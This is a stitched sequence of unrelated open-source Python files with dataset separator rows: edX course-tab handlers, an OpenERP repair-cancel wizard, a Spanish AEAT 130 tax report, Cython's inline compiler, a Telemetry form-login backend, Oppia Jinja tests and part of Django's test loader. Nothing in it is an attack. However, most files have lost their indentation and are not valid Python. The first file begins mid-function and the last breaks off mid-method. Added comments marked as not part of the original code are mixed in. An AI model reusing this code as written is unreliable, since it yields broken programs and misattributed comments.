# validate the tabs to make sure everything is Ok (e.g., did the client try to reorder unmovable tabs?)
try:
CourseTabList.validate_tabs(new_tab_list)
except InvalidTabsException, exception:
return JsonResponse(
{"error": "New list of tabs is not valid: {0}.".format(str(exception))}, status=400
)
# persist the new order of the tabs
course_item.tabs = new_tab_list
modulestore().update_item(course_item, request.user.id)
return JsonResponse()
def edit_tab_handler(course_item, request):
"""
Helper function for handling requests to edit settings of a single tab
"""
# Tabs are identified by tab_id or locator
tab_id_locator = request.json['tab_id_locator']
# Find the given tab in the course
tab = get_tab_by_tab_id_locator(course_item.tabs, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
if 'is_hidden' in request.json:
# set the is_hidden attribute on the requested tab
tab.is_hidden = request.json['is_hidden']
modulestore().update_item(course_item, request.user.id)
else:
raise NotImplementedError('Unsupported request to edit tab: {0}'.format(request.json))
return JsonResponse()
def get_tab_by_tab_id_locator(tab_list, tab_id_locator):
"""
Look for a tab with the specified tab_id or locator. Returns the first matching tab.
"""
    tab = None
    if 'tab_id' in tab_id_locator:
        tab = CourseTabList.get_tab_by_id(tab_list, tab_id_locator['tab_id'])
    elif 'tab_locator' in tab_id_locator:
        tab = get_tab_by_locator(tab_list, tab_id_locator['tab_locator'])
    return tab
def get_tab_by_locator(tab_list, usage_key_string):
"""
Look for a tab with the specified locator. Returns the first matching tab.
"""
tab_location = UsageKey.from_string(usage_key_string)
item = modulestore().get_item(tab_location)
static_tab = StaticTab(
name=item.display_name,
url_slug=item.location.name,
)
return CourseTabList.get_tab_by_id(tab_list, static_tab.tab_id)
# "primitive" tab edit functions driven by the command line.
# These should be replaced/deleted by a more capable GUI someday.
# Note that the command line UI identifies the tabs with 1-based
# indexing, but this implementation code is standard 0-based.
def validate_args(num, tab_type):
"Throws for the disallowed cases."
if num <= 1:
raise ValueError('Tabs 1 and 2 cannot be edited')
if tab_type == 'static_tab':
raise ValueError('Tabs of type static_tab cannot be edited here (use Studio)')
def primitive_delete(course, num):
"Deletes the given tab number (0 based)."
tabs = course.tabs
validate_args(num, tabs[num].get('type', ''))
del tabs[num]
# Note for future implementations: if you delete a static_tab, then Chris Dodge
# points out that there's other stuff to delete beyond this element.
# This code happens to not delete static_tab so it doesn't come up.
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
def primitive_insert(course, num, tab_type, name):
"Inserts a new tab at the given number (0 based)."
validate_args(num, tab_type)
new_tab = CourseTab.from_json({u'type': unicode(tab_type), u'name': unicode(name)})
tabs = course.tabs
tabs.insert(num, new_tab)
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
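# Illustrative note (not part of the original module): the command-line UI is
# 1-based while these helpers are 0-based, so deleting "tab 3" from that UI
# corresponds to primitive_delete(course, 2); indices 0 and 1 (the first two,
# unmovable tabs) are rejected by validate_args().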
| agpl-3.0 |
credativUK/OCB | addons/mrp_repair/wizard/cancel_repair.py | 52 | 3699 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
class repair_cancel(osv.osv_memory):
_name = 'mrp.repair.cancel'
_description = 'Cancel Repair'
def cancel_repair(self, cr, uid, ids, context=None):
""" Cancels the repair
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context = {}
record_id = context and context.get('active_id', False) or False
assert record_id, _('Active ID not Found')
repair_order_obj = self.pool.get('mrp.repair')
repair_line_obj = self.pool.get('mrp.repair.line')
repair_order = repair_order_obj.browse(cr, uid, record_id, context=context)
if repair_order.invoiced or repair_order.invoice_method == 'none':
repair_order_obj.action_cancel(cr, uid, [record_id], context=context)
else:
raise osv.except_osv(_('Warning!'),_('Repair order is not invoiced.'))
return {'type': 'ir.actions.act_window_close'}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
""" Changes the view dynamically
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: New arch of view.
"""
if context is None:
context = {}
res = super(repair_cancel, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
record_id = context and context.get('active_id', False) or False
active_model = context.get('active_model')
if not record_id or (active_model and active_model != 'mrp.repair'):
return res
repair_order = self.pool.get('mrp.repair').browse(cr, uid, record_id, context=context)
if not repair_order.invoiced:
res['arch'] = """
<form string="Cancel Repair" version="7.0">
<header>
<button name="cancel_repair" string="_Yes" type="object" class="oe_highlight"/>
or
<button string="Cancel" class="oe_link" special="cancel"/>
</header>
<label string="Do you want to continue?"/>
</form>
"""
return res
repair_cancel()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
cubells/l10n-spain | l10n_es_aeat_mod130/models/mod130.py | 1 | 10541 | # Copyright 2014-2019 Tecnativa - Pedro M. Baeza
from odoo import _, api, fields, exceptions, models
def trunc(f, n):
slen = len('%.*f' % (n, f))
return float(str(f)[:slen])
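# Illustrative note (not part of the original module): trunc() truncates rather
# than rounds, mirroring how the AEAT computes these amounts, e.g.
# trunc(1.999, 2) == 1.99 whereas round(1.999, 2) == 2.0.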
class L10nEsAeatMod130Report(models.Model):
_description = "AEAT 130 report"
_inherit = "l10n.es.aeat.report"
_name = "l10n.es.aeat.mod130.report"
_aeat_number = '130'
company_partner_id = fields.Many2one('res.partner',
string='Company partner',
                                         related='company_id.partner_id',
store=True)
currency_id = fields.Many2one('res.currency', string='Currency',
                                  related='company_id.currency_id',
store=True)
activity_type = fields.Selection(
[('primary', 'Actividad agrícola, ganadera, forestal o pesquera'),
('other', 'Actividad distinta a las anteriores')],
string='Tipo de actividad', states={'draft': [('readonly', False)]},
readonly=True, required=True, default='other')
has_deduccion_80 = fields.Boolean(
string="¿Deducción por art. 80 bis?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si puede beneficiarse de la deducción por "
"obtención de rendimientos de actividades económicas a efectos del "
"pago fraccionado por cumplir el siguiente requisito:\n Que, en el "
"primer trimestre del ejercicio o en el primer trimestre de inicio de "
"actividades, la suma del resultado de elevar al año el importe de la "
"casilla 03 y/o, en su caso, el resultado de elevar al año el 25 por "
"100 de la casilla 08, sea igual o inferior a 12.000 euros. En los "
"supuestos de inicio de la actividad a lo largo del ejercicio en la "
"elevación al año se tendrán en consideración los días que resten "
"hasta el final del año.", default=False)
has_prestamo = fields.Boolean(
string="¿Préstamo para vivienda habitual?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si destina cantidades al pago de préstamos "
"para la adquisición o rehabilitación de la vivienda habitual. Si "
"marca la casilla, se podrá realiza un 2% de deducción sobre el "
"importe de la casilla [03], con un máximo de 660,14 € por trimestre, "
"o del 2% de la casilla [08], con un máximo de 660,14 euros anuales. "
"\nDebe consultar las excepciones para las que no se computaría "
"la deducción a pesar del préstamo.", default=False)
comments = fields.Char(
string="Observaciones", size=350, readonly=True,
help="Observaciones que se adjuntarán con el modelo",
states={'draft': [('readonly', False)]})
casilla_01 = fields.Monetary(
string="Casilla [01] - Ingresos",
readonly=True,
)
real_expenses = fields.Monetary(
string="Gastos reales",
help="Gastos en el periodo sin contar con el 5% adicional de difícil "
"justificación.",
)
non_justified_expenses = fields.Monetary(
string="Gastos de difícil justificación",
help="Calculado como el 5% del rendimiento del periodo (ingresos - "
"gastos reales).",
)
casilla_02 = fields.Monetary(string="Casilla [02] - Gastos", readonly=True)
casilla_03 = fields.Monetary(
string="Casilla [03] - Rendimiento",
readonly=True,
)
casilla_04 = fields.Monetary(string="Casilla [04] - IRPF", readonly=True)
casilla_05 = fields.Monetary(string="Casilla [05]")
casilla_06 = fields.Monetary(string="Casilla [06]", readonly=True)
casilla_07 = fields.Monetary(string="Casilla [07]", readonly=True)
casilla_08 = fields.Monetary(
string="Casilla [08] - Ingresos primario",
readonly=True,
)
casilla_09 = fields.Monetary(
string="Casilla [09] - IRPF primario",
readonly=True,
)
casilla_10 = fields.Monetary(string="Casilla [10]", readonly=True)
casilla_11 = fields.Monetary(string="Casilla [11]", readonly=True)
casilla_12 = fields.Monetary(string="Casilla [12]", readonly=True)
casilla_13 = fields.Monetary(
string="Casilla [13] - Deducción art. 80 bis",
readonly=True,
)
casilla_14 = fields.Monetary(string="Casilla [14]", readonly=True)
casilla_15 = fields.Monetary(string="Casilla [15]", readonly=True)
casilla_16 = fields.Monetary(
string="Casilla [16] - Deducción por pago de hipoteca",
readonly=True,
)
casilla_17 = fields.Monetary(string="Casilla [17]", readonly=True)
casilla_18 = fields.Monetary(string="Casilla [18]", readonly=True)
result = fields.Monetary(
string="Resultado",
compute="_compute_result",
store=True,
)
tipo_declaracion = fields.Selection(
selection=[
('I', 'A ingresar'),
('N', 'Negativa'),
('B', 'A deducir')
],
string='Tipo declaración',
compute="_compute_tipo_declaracion",
store=True,
)
@api.depends('casilla_18', 'casilla_17')
def _compute_result(self):
for report in self:
report.result = report.casilla_17 - report.casilla_18
@api.depends('result')
def _compute_tipo_declaracion(self):
for report in self:
if report.result < 0:
report.tipo_declaracion = (
"B" if report.period_type != '4T' else "N"
)
else:
report.tipo_declaracion = "I"
@api.multi
def _calc_ingresos_gastos(self):
self.ensure_one()
aml_obj = self.env['account.move.line']
date_start = '%s-01-01' % self.year
extra_domain = [
('company_id', '=', self.company_id.id),
('date', '>=', date_start),
('date', '<=', self.date_end),
]
groups = aml_obj.read_group([
('account_id.code', '=like', '7%'),
] + extra_domain, ['balance'], [])
incomes = groups[0]['balance'] and -groups[0]['balance'] or 0.0
groups = aml_obj.read_group([
('account_id.code', '=like', '6%'),
] + extra_domain, ['balance'], [])
expenses = groups[0]['balance'] or 0.0
return (incomes, expenses)
@api.multi
def _calc_prev_trimesters_data(self):
self.ensure_one()
amount = 0
prev_reports = self._get_previous_fiscalyear_reports(self.date_start)
for prev in prev_reports:
if prev.casilla_07 > 0:
amount += prev.casilla_07 - prev.casilla_16
return amount
@api.multi
def calculate(self):
for report in self:
if report.activity_type == 'primary':
raise exceptions.Warning(_('Este tipo de actividad no '
'está aún soportado por el módulo.'))
if report.has_deduccion_80:
raise exceptions.Warning(_(
'No se pueden calcular por el '
'momento declaraciones que contengan deducciones por el '
'artículo 80 bis.'))
vals = {}
if report.activity_type == 'other':
ingresos, gastos = report._calc_ingresos_gastos()
vals['casilla_01'] = ingresos
vals['real_expenses'] = gastos
rendimiento_bruto = (ingresos - gastos)
if rendimiento_bruto > 0:
vals['non_justified_expenses'] = round(
rendimiento_bruto * 0.05, 2
)
else:
vals['non_justified_expenses'] = 0.0
vals['casilla_02'] = gastos + vals['non_justified_expenses']
# Rendimiento
vals['casilla_03'] = ingresos - vals['casilla_02']
# IRPF - Truncar resultado, ya que es lo que hace la AEAT
if vals['casilla_03'] < 0:
vals['casilla_04'] = 0.0
else:
vals['casilla_04'] = trunc(0.20 * vals['casilla_03'], 2)
# Pago fraccionado previo del trimestre
vals['casilla_05'] = report._calc_prev_trimesters_data()
vals['casilla_07'] = (vals['casilla_04'] - vals['casilla_05'] -
report.casilla_06)
vals['casilla_12'] = vals['casilla_07']
if vals['casilla_12'] < 0:
vals['casilla_12'] = 0.0
else:
# TODO: Modelo 130 para actividades primarias
vals['casilla_12'] = vals['casilla_11']
# TODO: Deducción artículo 80 bis
vals['casilla_13'] = 0.0
vals['casilla_14'] = vals['casilla_12'] - vals['casilla_13']
# TODO: Poner los resultados negativos de anteriores trimestres
vals['casilla_15'] = 0.0
# Deducción por hipóteca
if report.has_prestamo and vals['casilla_14'] > 0:
# Truncar resultado, ya que es lo que hace la AEAT
deduccion = trunc(0.02 * vals['casilla_03'], 2)
if report.activity_type == 'other':
if deduccion > 660.14:
deduccion = 660.14
else:
raise exceptions.Warning(_('No implementado'))
dif = vals['casilla_14'] - vals['casilla_15']
if deduccion > dif:
deduccion = dif
vals['casilla_16'] = deduccion
else:
vals['casilla_16'] = 0.0
vals['casilla_17'] = (vals['casilla_14'] - vals['casilla_15'] -
vals['casilla_16'])
report.write(vals)
return True
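    # Illustrative worked example (not part of the original module), assuming a
    # quarter with 10,000 € of income, 4,000 € of booked expenses and no prior
    # payments or withholdings: non_justified_expenses = 5% of 6,000 = 300,
    # casilla_02 = 4,300, casilla_03 = 5,700, casilla_04 = trunc(20% of 5,700)
    # = 1,140 and casilla_07 = casilla_12 = 1,140.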
@api.multi
def button_confirm(self):
"""Check its records"""
msg = ""
for report in self:
if report.type == 'C' and not report.casilla_18:
msg = _(
'Debe introducir una cantidad en la casilla 18 como '
'ha marcado la casilla de declaración complementaria.'
)
if msg:
raise exceptions.ValidationError(msg)
return super(L10nEsAeatMod130Report, self).button_confirm()
| agpl-3.0 |
collinjackson/mojo | third_party/cython/src/Cython/Build/Inline.py | 89 | 10878 | import sys, os, re, inspect
import imp
try:
import hashlib
except ImportError:
import md5 as hashlib
from distutils.core import Distribution, Extension
from distutils.command.build_ext import build_ext
import Cython
from Cython.Compiler.Main import Context, CompilationOptions, default_options
from Cython.Compiler.ParseTreeTransforms import CythonTransform, SkipDeclarations, AnalyseDeclarationsTransform
from Cython.Compiler.TreeFragment import parse_from_strings
from Cython.Build.Dependencies import strip_string_literals, cythonize, cached_function
from Cython.Compiler import Pipeline
from Cython.Utils import get_cython_cache_dir
import cython as cython_module
# A utility function to convert user-supplied ASCII strings to unicode.
if sys.version_info[0] < 3:
def to_unicode(s):
if not isinstance(s, unicode):
return s.decode('ascii')
else:
return s
else:
to_unicode = lambda x: x
class AllSymbols(CythonTransform, SkipDeclarations):
def __init__(self):
CythonTransform.__init__(self, None)
self.names = set()
def visit_NameNode(self, node):
self.names.add(node.name)
@cached_function
def unbound_symbols(code, context=None):
code = to_unicode(code)
if context is None:
context = Context([], default_options)
from Cython.Compiler.ParseTreeTransforms import AnalyseDeclarationsTransform
tree = parse_from_strings('(tree fragment)', code)
for phase in Pipeline.create_pipeline(context, 'pyx'):
if phase is None:
continue
tree = phase(tree)
if isinstance(phase, AnalyseDeclarationsTransform):
break
symbol_collector = AllSymbols()
symbol_collector(tree)
unbound = []
try:
import builtins
except ImportError:
import __builtin__ as builtins
for name in symbol_collector.names:
if not tree.scope.lookup(name) and not hasattr(builtins, name):
unbound.append(name)
return unbound
def unsafe_type(arg, context=None):
py_type = type(arg)
if py_type is int:
return 'long'
else:
return safe_type(arg, context)
def safe_type(arg, context=None):
py_type = type(arg)
if py_type in [list, tuple, dict, str]:
return py_type.__name__
elif py_type is complex:
return 'double complex'
elif py_type is float:
return 'double'
elif py_type is bool:
return 'bint'
elif 'numpy' in sys.modules and isinstance(arg, sys.modules['numpy'].ndarray):
return 'numpy.ndarray[numpy.%s_t, ndim=%s]' % (arg.dtype.name, arg.ndim)
else:
for base_type in py_type.mro():
if base_type.__module__ in ('__builtin__', 'builtins'):
return 'object'
module = context.find_module(base_type.__module__, need_pxd=False)
if module:
entry = module.lookup(base_type.__name__)
if entry.is_type:
return '%s.%s' % (base_type.__module__, base_type.__name__)
return 'object'
def _get_build_extension():
dist = Distribution()
# Ensure the build respects distutils configuration by parsing
# the configuration files
config_files = dist.find_config_files()
dist.parse_config_files(config_files)
build_extension = build_ext(dist)
build_extension.finalize_options()
return build_extension
@cached_function
def _create_context(cython_include_dirs):
return Context(list(cython_include_dirs), default_options)
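# Compiles the given code string into an on-the-fly Cython extension module and
# calls it immediately. Unbound names are filled in from the caller's locals and
# globals, the module is keyed by a hash of the code, the argument signatures and
# the interpreter/Cython versions, and built extensions are cached under lib_dir
# so repeated calls with the same inputs reuse the compiled module.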
def cython_inline(code,
get_type=unsafe_type,
lib_dir=os.path.join(get_cython_cache_dir(), 'inline'),
cython_include_dirs=['.'],
force=False,
quiet=False,
locals=None,
globals=None,
**kwds):
if get_type is None:
get_type = lambda x: 'object'
code = to_unicode(code)
orig_code = code
code, literals = strip_string_literals(code)
code = strip_common_indent(code)
ctx = _create_context(tuple(cython_include_dirs))
if locals is None:
locals = inspect.currentframe().f_back.f_back.f_locals
if globals is None:
globals = inspect.currentframe().f_back.f_back.f_globals
try:
for symbol in unbound_symbols(code):
if symbol in kwds:
continue
elif symbol in locals:
kwds[symbol] = locals[symbol]
elif symbol in globals:
kwds[symbol] = globals[symbol]
else:
print("Couldn't find ", symbol)
except AssertionError:
if not quiet:
# Parsing from strings not fully supported (e.g. cimports).
print("Could not parse code as a string (to extract unbound symbols).")
cimports = []
for name, arg in kwds.items():
if arg is cython_module:
cimports.append('\ncimport cython as %s' % name)
del kwds[name]
arg_names = kwds.keys()
arg_names.sort()
arg_sigs = tuple([(get_type(kwds[arg], ctx), arg) for arg in arg_names])
key = orig_code, arg_sigs, sys.version_info, sys.executable, Cython.__version__
module_name = "_cython_inline_" + hashlib.md5(str(key).encode('utf-8')).hexdigest()
if module_name in sys.modules:
module = sys.modules[module_name]
else:
build_extension = None
if cython_inline.so_ext is None:
# Figure out and cache current extension suffix
build_extension = _get_build_extension()
cython_inline.so_ext = build_extension.get_ext_filename('')
module_path = os.path.join(lib_dir, module_name + cython_inline.so_ext)
if not os.path.exists(lib_dir):
os.makedirs(lib_dir)
if force or not os.path.isfile(module_path):
cflags = []
c_include_dirs = []
qualified = re.compile(r'([.\w]+)[.]')
for type, _ in arg_sigs:
m = qualified.match(type)
if m:
cimports.append('\ncimport %s' % m.groups()[0])
# one special case
if m.groups()[0] == 'numpy':
import numpy
c_include_dirs.append(numpy.get_include())
# cflags.append('-Wno-unused')
module_body, func_body = extract_func_code(code)
params = ', '.join(['%s %s' % a for a in arg_sigs])
module_code = """
%(module_body)s
%(cimports)s
def __invoke(%(params)s):
%(func_body)s
""" % {'cimports': '\n'.join(cimports), 'module_body': module_body, 'params': params, 'func_body': func_body }
for key, value in literals.items():
module_code = module_code.replace(key, value)
pyx_file = os.path.join(lib_dir, module_name + '.pyx')
fh = open(pyx_file, 'w')
try:
fh.write(module_code)
finally:
fh.close()
extension = Extension(
name = module_name,
sources = [pyx_file],
include_dirs = c_include_dirs,
extra_compile_args = cflags)
if build_extension is None:
build_extension = _get_build_extension()
build_extension.extensions = cythonize([extension], include_path=cython_include_dirs, quiet=quiet)
build_extension.build_temp = os.path.dirname(pyx_file)
build_extension.build_lib = lib_dir
build_extension.run()
module = imp.load_dynamic(module_name, module_path)
arg_list = [kwds[arg] for arg in arg_names]
return module.__invoke(*arg_list)
# Cached suffix used by cython_inline above. None should get
# overridden with actual value upon the first cython_inline invocation
cython_inline.so_ext = None
non_space = re.compile('[^ ]')
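# Strips the smallest common leading indentation from a code fragment, ignoring
# blank lines and lines whose first non-space character starts a comment.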
def strip_common_indent(code):
min_indent = None
lines = code.split('\n')
for line in lines:
match = non_space.search(line)
if not match:
continue # blank
indent = match.start()
if line[indent] == '#':
continue # comment
elif min_indent is None or min_indent > indent:
min_indent = indent
for ix, line in enumerate(lines):
match = non_space.search(line)
        if not match or line[match.start()] == '#':
continue
else:
lines[ix] = line[min_indent:]
return '\n'.join(lines)
module_statement = re.compile(r'^((cdef +(extern|class))|cimport|(from .+ cimport)|(from .+ import +[*]))')
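# Splits a fragment into module-level statements (cdef extern/class, cimports,
# 'from ... cimport', star imports) and the remaining lines, which are indented
# and wrapped into the body of the generated __invoke() function.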
def extract_func_code(code):
module = []
function = []
current = function
code = code.replace('\t', ' ')
lines = code.split('\n')
for line in lines:
if not line.startswith(' '):
if module_statement.match(line):
current = module
else:
current = function
current.append(line)
return '\n'.join(module), ' ' + '\n '.join(function)
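# inspect.getcallargs() only exists on Python 2.7+; the fallback below is a
# minimal reimplementation that maps positional, keyword and default values
# onto the wrapped function's argument names.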
try:
from inspect import getcallargs
except ImportError:
def getcallargs(func, *arg_values, **kwd_values):
all = {}
args, varargs, kwds, defaults = inspect.getargspec(func)
if varargs is not None:
all[varargs] = arg_values[len(args):]
for name, value in zip(args, arg_values):
all[name] = value
for name, value in kwd_values.items():
if name in args:
if name in all:
raise TypeError("Duplicate argument %s" % name)
all[name] = kwd_values.pop(name)
if kwds is not None:
all[kwds] = kwd_values
elif kwd_values:
raise TypeError("Unexpected keyword arguments: %s" % kwd_values.keys())
if defaults is None:
defaults = ()
first_default = len(args) - len(defaults)
for ix, name in enumerate(args):
if name not in all:
if ix >= first_default:
all[name] = defaults[ix - first_default]
else:
raise TypeError("Missing argument: %s" % name)
return all
def get_body(source):
ix = source.index(':')
if source[:5] == 'lambda':
return "return %s" % source[ix+1:]
else:
return source[ix+1:]
# Lots to be done here... It would be especially cool if compiled functions
# could invoke each other quickly.
class RuntimeCompiledFunction(object):
def __init__(self, f):
self._f = f
self._body = get_body(inspect.getsource(f))
def __call__(self, *args, **kwds):
all = getcallargs(self._f, *args, **kwds)
return cython_inline(self._body, locals=self._f.func_globals, globals=self._f.func_globals, **all)
| bsd-3-clause |
yury-s/v8-inspector | Source/chrome/tools/telemetry/telemetry/core/backends/form_based_credentials_backend.py | 24 | 3604 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry.core import exceptions
class FormBasedCredentialsBackend(object):
def __init__(self):
self._logged_in = False
def IsAlreadyLoggedIn(self, tab):
return tab.EvaluateJavaScript(self.logged_in_javascript)
@property
def credentials_type(self):
raise NotImplementedError()
@property
def url(self):
raise NotImplementedError()
@property
def login_form_id(self):
raise NotImplementedError()
@property
def login_button_javascript(self):
"""Some sites have custom JS to log in."""
return None
@property
def login_input_id(self):
raise NotImplementedError()
@property
def password_input_id(self):
raise NotImplementedError()
@property
def logged_in_javascript(self):
"""Evaluates to true iff already logged in."""
raise NotImplementedError()
def IsLoggedIn(self):
return self._logged_in
def _ResetLoggedInState(self):
"""Makes the backend think we're not logged in even though we are.
Should only be used in unit tests to simulate --dont-override-profile.
"""
self._logged_in = False
def _WaitForLoginState(self, action_runner):
"""Waits until it can detect either the login form, or already logged in."""
condition = '(document.querySelector("#%s") !== null) || (%s)' % (
self.login_form_id, self.logged_in_javascript)
action_runner.WaitForJavaScriptCondition(condition, 60)
def _SubmitLoginFormAndWait(self, action_runner, tab, username, password):
"""Submits the login form and waits for the navigation."""
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
email_id = 'document.querySelector("#%s #%s").value = "%s"; ' % (
self.login_form_id, self.login_input_id, username)
password = 'document.querySelector("#%s #%s").value = "%s"; ' % (
self.login_form_id, self.password_input_id, password)
tab.ExecuteJavaScript(email_id)
tab.ExecuteJavaScript(password)
if self.login_button_javascript:
tab.ExecuteJavaScript(self.login_button_javascript)
else:
tab.ExecuteJavaScript(
'document.getElementById("%s").submit();' % self.login_form_id)
# Wait for the form element to disappear as confirmation of the navigation.
action_runner.WaitForNavigate()
def LoginNeeded(self, tab, action_runner, config):
"""Logs in to a test account.
Raises:
RuntimeError: if could not get credential information.
"""
if self._logged_in:
return True
if 'username' not in config or 'password' not in config:
message = ('Credentials for "%s" must include username and password.' %
self.credentials_type)
raise RuntimeError(message)
logging.debug('Logging into %s account...' % self.credentials_type)
if 'url' in config:
url = config['url']
else:
url = self.url
try:
logging.info('Loading %s...', url)
tab.Navigate(url)
self._WaitForLoginState(action_runner)
if self.IsAlreadyLoggedIn(tab):
self._logged_in = True
return True
self._SubmitLoginFormAndWait(
action_runner, tab, config['username'], config['password'])
self._logged_in = True
return True
except exceptions.TimeoutException:
logging.warning('Timed out while loading: %s', url)
return False
def LoginNoLongerNeeded(self, tab): # pylint: disable=W0613
assert self._logged_in
| bsd-3-clause |
amitdeutsch/oppia | jinja_utils_test.py | 9 | 4194 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=relative-import
from core.tests import test_utils
import jinja_utils
class JinjaUtilsUnitTests(test_utils.GenericTestBase):
def test_js_string_filter(self):
"""Test js_string filter."""
expected_values = [
('a', '\\"a\\"'),
(2, '2'),
(5.5, '5.5'),
("'", '\\"\\\'\\"'),
(u'¡Hola!', '\\"\\\\u00a1Hola!\\"'),
(['a', '¡Hola!', 2], '[\\"a\\", \\"\\\\u00a1Hola!\\", 2]'),
({'a': 4, '¡Hola!': 2}, '{\\"a\\": 4, \\"\\\\u00a1Hola!\\": 2}'),
('', '\\"\\"'),
(None, 'null'),
(['a', {'b': 'c', 'd': ['e', None]}],
'[\\"a\\", {\\"b\\": \\"c\\", \\"d\\": [\\"e\\", null]}]')
]
for tup in expected_values:
self.assertEqual(jinja_utils.JINJA_FILTERS['js_string'](
tup[0]), tup[1])
def test_parse_string(self):
parsed_str = jinja_utils.parse_string('{{test}}', {'test': 'hi'})
self.assertEqual(parsed_str, 'hi')
# Some parameters are missing.
parsed_str = jinja_utils.parse_string(
'{{test}} and {{test2}}', {'test2': 'hi'})
self.assertEqual(parsed_str, ' and hi')
# All parameters are missing.
parsed_str = jinja_utils.parse_string('{{test}} and {{test2}}', {})
self.assertEqual(parsed_str, ' and ')
# The string has no parameters.
parsed_str = jinja_utils.parse_string('no params', {'param': 'hi'})
self.assertEqual(parsed_str, 'no params')
# Integer parameters are used.
parsed_str = jinja_utils.parse_string('int {{i}}', {'i': 2})
self.assertEqual(parsed_str, 'int 2')
def test_evaluate_object(self):
parsed_object = jinja_utils.evaluate_object('abc', {})
self.assertEqual(parsed_object, 'abc')
parsed_object = jinja_utils.evaluate_object('{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'c')
parsed_object = jinja_utils.evaluate_object('abc{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'abcc')
parsed_object = jinja_utils.evaluate_object(
['a', '{{a}}', 'a{{a}}'], {'a': 'b'})
self.assertEqual(parsed_object, ['a', 'b', 'ab'])
parsed_object = jinja_utils.evaluate_object({}, {})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({}, {'a': 'b'})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({'a': 'b'}, {})
self.assertEqual(parsed_object, {'a': 'b'})
parsed_object = jinja_utils.evaluate_object(
{'a': 'a{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'ac'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 3})
self.assertEqual(parsed_object, {'a': '3'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'c'})
# Failure cases should be handled gracefully.
parsed_object = jinja_utils.evaluate_object('{{c}}', {})
self.assertEqual(parsed_object, '')
parsed_object = jinja_utils.evaluate_object('{{c}}', {'a': 'b'})
self.assertEqual(parsed_object, '')
# Test that the original dictionary is unchanged.
orig_dict = {'a': '{{b}}'}
parsed_dict = jinja_utils.evaluate_object(orig_dict, {'b': 'c'})
self.assertEqual(orig_dict, {'a': '{{b}}'})
self.assertEqual(parsed_dict, {'a': 'c'})
| apache-2.0 |
cosmiclattes/TPBviz | torrent/lib/python2.7/site-packages/django/utils/unittest/loader.py | 110 | 13445 | """Loading unittests."""
import os
import re
import sys
import traceback
import types
import unittest
from fnmatch import fnmatch
from django.utils.unittest import case, suite
try:
from os.path import relpath
except ImportError:
from django.utils.unittest.compatibility import relpath
__unittest = True
def _CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
# what about .pyc or .pyo (etc)
# we would need to avoid loading the same tests multiple times
# from '.py', '.pyc' *and* '.pyo'
VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)
def _make_failed_import_test(name, suiteClass):
message = 'Failed to import test module: %s' % name
if hasattr(traceback, 'format_exc'):
# Python 2.3 compatibility
# format_exc returns two frames of discover.py as well
message += '\n%s' % traceback.format_exc()
return _make_failed_test('ModuleImportFailure', name, ImportError(message),
suiteClass)
def _make_failed_load_tests(name, exception, suiteClass):
return _make_failed_test('LoadTestsFailure', name, exception, suiteClass)
def _make_failed_test(classname, methodname, exception, suiteClass):
def testFailure(self):
raise exception
attrs = {methodname: testFailure}
TestClass = type(classname, (case.TestCase,), attrs)
return suiteClass((TestClass(methodname),))
class TestLoader(unittest.TestLoader):
"""
This class is responsible for loading tests according to various criteria
and returning them wrapped in a TestSuite
"""
testMethodPrefix = 'test'
sortTestMethodsUsing = cmp
suiteClass = suite.TestSuite
_top_level_dir = None
def loadTestsFromTestCase(self, testCaseClass):
"""Return a suite of all tests cases contained in testCaseClass"""
if issubclass(testCaseClass, suite.TestSuite):
raise TypeError("Test cases should not be derived from TestSuite."
" Maybe you meant to derive from TestCase?")
testCaseNames = self.getTestCaseNames(testCaseClass)
if not testCaseNames and hasattr(testCaseClass, 'runTest'):
testCaseNames = ['runTest']
